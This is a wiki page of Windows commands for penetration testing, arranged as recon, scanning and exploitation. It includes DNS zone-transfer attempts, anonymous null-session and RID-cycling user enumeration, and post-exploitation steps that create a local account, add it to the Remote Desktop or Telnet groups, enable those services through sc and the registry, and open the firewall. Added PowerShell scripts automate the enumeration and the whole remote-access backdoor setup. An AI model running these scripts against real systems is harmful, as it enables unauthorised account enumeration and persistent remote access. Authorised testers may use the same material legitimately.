Difference between revisions of "Windows Commands"
Revision as of 21:03, 17 July 2008
Recon
nslookup
- Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
nslookup <site>
- Interactive mode (one command per prompt; `ls -d` asks the server for a full zone transfer, which only succeeds if the server allows AXFR from your address):
nslookup
> [name or ip]
> server [server ip]
> set type=any
> ls -d [target_domain] [> filename]
> view [filename]
- No recurse (ask the server only for what it is authoritative for, then switch back):
> set norecurse
> set recurse
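The lookups above, scripted, as an added example (not part of the original page): the record-type queries are run non-interactively with `-type=`, the authoritative servers are pulled out of the NS answer, and because `ls -d` exists only in interactive mode, the interactive session is fed its commands over stdin instead of being typed. The `nameserver =` and `Can't list domain` strings are assumptions about Windows nslookup's output format; `example.com` is a placeholder.

```powershell
function Get-DnsRecon {
    param(
        [Parameter(Mandatory)] [string]$Domain,
        [string[]]$RecordTypes = @('NS', 'A', 'MX', 'TXT', 'SOA', 'SRV', 'HINFO', 'RP')
    )
    $result = @{}
    foreach ($type in $RecordTypes) {
        # Non-interactive equivalent of "set type=<type>" followed by the name.
        $result[$type] = & nslookup.exe "-type=$type" $Domain 2>&1 | Out-String
    }

    # Each authoritative server is a candidate for "server <ns>" + "ls -d <domain>".
    # Assumed output layout: "<domain>   nameserver = ns1.example.com".
    $nameServers = [regex]::Matches($result['NS'], 'nameserver\s*=\s*(\S+)') |
        ForEach-Object { $_.Groups[1].Value.TrimEnd('.') } | Sort-Object -Unique

    $result['AXFR'] = @{}
    foreach ($ns in $nameServers) {
        # "ls -d" is interactive-only, so hand the interactive session its
        # commands on stdin; PowerShell writes each string as one input line.
        $commands = @("server $ns", "ls -d $Domain", "exit")
        $out = $commands | & nslookup.exe 2>&1 | Out-String
        # Refusal text is an assumption about the Windows nslookup wording.
        if ($out -match 'Query refused|Can''t list domain') {
            $result['AXFR'][$ns] = 'refused'
        } else {
            $result['AXFR'][$ns] = $out
        }
    }
    return $result
}

# Placeholder target; replace with the domain under assessment.
$recon = Get-DnsRecon -Domain 'example.com'
$recon['NS']
$recon['AXFR'].GetEnumerator() | ForEach-Object { '{0}: {1}' -f $_.Key, ($_.Value -split "`n")[0] }
```

A zone that transfers hands over every hostname at once, so the AXFR attempt is worth running against every listed name server, not just the first: misconfiguration is usually per-server.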
Scanning
tracert
Parameters
- -d -- don't resolve names
- -h <N> -- max number of hops (default 30)
- -j <hostlist> -- use loose source routing
- -w <N> -- wait N ms for each reply before timing out (default 4000)
Null session
- Establishing a null session (anonymous connection to the IPC$ share; empty user name and empty password)
net use \\<target>\ipc$ "" /u:""
- Enumerating users and groups over the null session
enum -U <target>
enum -G <target>
- user2sid
- Outputs in the form S-X-Y-target_sid-RID
user2sid \\<target> <machine_name>
- sid2user
- Takes the SID with spaces instead of dashes and without the leading S-1-, i.e. 5 21 <a> <b> <c> <RID>
sid2user \\<target> 5 <target_sid> <N>
- Walk a RID range (user accounts normally start at 1000; inside a batch file write %%i instead of %i)
for /L %i in (1000, 1, 1050) do @sid2user \\<target> 5 <target_sid> %i
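The null-session and RID-walking steps above, as one added example (not from the original page). It assumes user2sid.exe and sid2user.exe are on PATH, that the target still accepts anonymous IPC$ connections, and that user2sid prints the domain SID as `S-1-5-21-x-y-z` and sid2user prints `Name is <account>` on a hit (both output layouts are assumptions); `192.0.2.10` is a placeholder.

```powershell
function Invoke-RidCycle {
    param(
        [Parameter(Mandatory)] [string]$Target,
        [int]$FirstRid = 1000,
        [int]$LastRid  = 1050
    )
    # 1. Null session: empty user and empty password against IPC$.
    #    Start-Process passes the argument string to net.exe verbatim, so the
    #    two "" survive (PowerShell would otherwise drop empty-string arguments).
    $p = Start-Process -FilePath net.exe -NoNewWindow -Wait -PassThru `
        -ArgumentList "use \\$Target\ipc$ `"`" /user:`"`""
    if ($p.ExitCode -ne 0) { throw "null session to $Target was refused" }

    try {
        # 2. Resolve the machine/domain SID by looking up the computer name.
        $out = & user2sid.exe "\\$Target" $Target 2>&1 | Out-String
        if ($out -match '(S-1-5-21-\d+-\d+-\d+)') {
            $domainSid = $Matches[1]
        } else {
            throw "no domain SID in user2sid output:`n$out"
        }
        # sid2user wants the subauthorities space-separated, without "S-1-".
        $sidParts = ($domainSid -replace '^S-1-', '') -split '-'   # 5 21 x y z

        # 3. Walk the RID range; an array argument expands to separate args.
        $found = @()
        foreach ($rid in $FirstRid..$LastRid) {
            $line = & sid2user.exe "\\$Target" $sidParts $rid 2>&1 | Out-String
            if ($line -match 'Name is\s+([^\r\n]+)') {
                $found += [pscustomobject]@{
                    RID  = $rid
                    Name = $Matches[1].Trim()
                    Sid  = "$domainSid-$rid"
                }
            }
        }
        return $found
    } finally {
        # 4. Always tear the null session down, even if enumeration failed.
        & net.exe use "\\$Target\ipc$" /delete 2>&1 | Out-Null
    }
}

Invoke-RidCycle -Target '192.0.2.10' | Format-Table -AutoSize
```

RID 500 (built-in Administrator) and 501 (Guest) are outside the default 1000-1050 window; pass `-FirstRid 500` to confirm the administrator account's real name even when it has been renamed.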
Exploitation
Finding client-side programs
dir /s "c:\Program Files"
dir /s /b "c:\Program Files\*.exe"
Service interaction
List running services
sc query
List all services (the space after "state=" is required by sc)
sc query state= all
List all service names
sc query state= all | find "SERVICE_NAME"
Query service status (query) and configuration such as binary path, start type and account (qc)
sc query <servicename>
sc qc <servicename>
Start a service
sc config <servicename> start= auto
sc start <servicename>
Starting telnet
sc query tlntsvr
sc config tlntsvr start= auto
sc start tlntsvr
Starting terminal services
sc query termservice
sc config termservice start= auto
sc start termservice
Users and groups
Listing users
net user
Creating a user
net user <username> <password> /add
Listing groups
net localgroup
Creating a group
net localgroup <groupname> /add
Adding a user to a group
net localgroup <groupname> <username> /add
Adding a user to the telnet users group
net user <username> <password> /add
net localgroup TelnetClients /add
net localgroup TelnetClients <username> /add
Adding a user to the terminal services group
net localgroup "Remote Desktop Users" <username> /add
Firewall interaction
The netsh firewall context below is the XP/2003 one; from Vista onward it is deprecated in favour of netsh advfirewall firewall. "scope = custom addresses =" limits the opening to the listed source addresses, which keeps the hole from being usable by anyone else on the network.
Opening the firewall for telnet
netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address>
Opening the firewall for terminal services
netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = <address>
Opening the firewall for SSH
netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = <address>
Registry interaction
Enabling terminal services (fDenyTSConnections = 0 allows incoming RDP; the value already exists, so /f is needed to overwrite it without the interactive "overwrite?" prompt, which hangs a non-interactive shell)
reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0 /f
netstat
Finding a port (find matches substrings, so "80" also hits 8080 and 3380; search for the colon and the trailing space, e.g. ":80 ", to anchor it)
netstat -an | find "<port>"
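The whole remote-access procedure from this page (service interaction, users and groups, registry, firewall, netstat check) as one added example, not code from the original page: create a user, put it in Remote Desktop Users, flip fDenyTSConnections, start TermService via sc, open the firewall, and confirm the listener. The function names, the `[Environment]::OSVersion` check used to pick the netsh context, and the placeholder values in the usage line are assumptions; telnet is the same sequence with tlntsvr, TelnetClients and port 23.

```powershell
function Start-ServiceWithSc {
    param([Parameter(Mandatory)] [string]$Name)
    # "sc" alone is a PowerShell alias for Set-Content; call the binary explicitly.
    # The space after "start=" is required by sc.exe, not a typo.
    & sc.exe config $Name start= auto | Out-Null
    & sc.exe start $Name | Out-Null
    # Poll "sc query" until the STATE line ("STATE : 4  RUNNING") says RUNNING.
    foreach ($attempt in 1..10) {
        $m = & sc.exe query $Name | Select-String 'STATE\s*:\s*\d+\s+(\S+)'
        if ($m -and $m.Matches[0].Groups[1].Value -eq 'RUNNING') { return $true }
        Start-Sleep -Seconds 1
    }
    return $false
}

function Enable-RemoteDesktopAccess {
    param(
        [Parameter(Mandatory)] [string]$UserName,
        [Parameter(Mandatory)] [string]$Password,
        [Parameter(Mandatory)] [string]$AllowedFrom   # source address for the firewall scope
    )
    # Users and groups: local account, then membership in the RDP group.
    & net.exe user $UserName $Password /add | Out-Null
    & net.exe localgroup 'Remote Desktop Users' $UserName /add | Out-Null

    # Registry: 0 = allow incoming Terminal Services connections; /f avoids the overwrite prompt.
    & reg.exe add 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' `
        /v fDenyTSConnections /t REG_DWORD /d 0 /f | Out-Null

    # Service interaction.
    if (-not (Start-ServiceWithSc -Name termservice)) { throw 'TermService did not reach RUNNING' }

    # Firewall: "netsh firewall" is the XP/2003 context; Vista (NT 6.0) and later use advfirewall.
    if ([Environment]::OSVersion.Version.Major -ge 6) {
        & netsh.exe advfirewall firewall add rule name=RDP dir=in action=allow `
            protocol=TCP localport=3389 remoteip=$AllowedFrom | Out-Null
    } else {
        & netsh.exe firewall set service type=remotedesktop mode=enable `
            scope=custom addresses=$AllowedFrom | Out-Null
    }

    # netstat: anchor on ":3389" followed by whitespace so 13389 or 33890 do not match.
    $listening = & netstat.exe -an | Select-String -Pattern ':3389\s+\S+\s+LISTENING'
    return [bool]$listening
}

# Placeholder values; run from an elevated prompt.
Enable-RemoteDesktopAccess -UserName 'svc_backup' -Password 'P@ssw0rd-change-me' -AllowedFrom '192.0.2.5'
```

Every step here is also a detection opportunity for the other side: a new local account, a Remote Desktop Users membership change, a write to fDenyTSConnections, a service start-type change and a new firewall rule all land in the event log, so on an engagement note the timestamps for the report and clean up the account, rule and registry value afterwards.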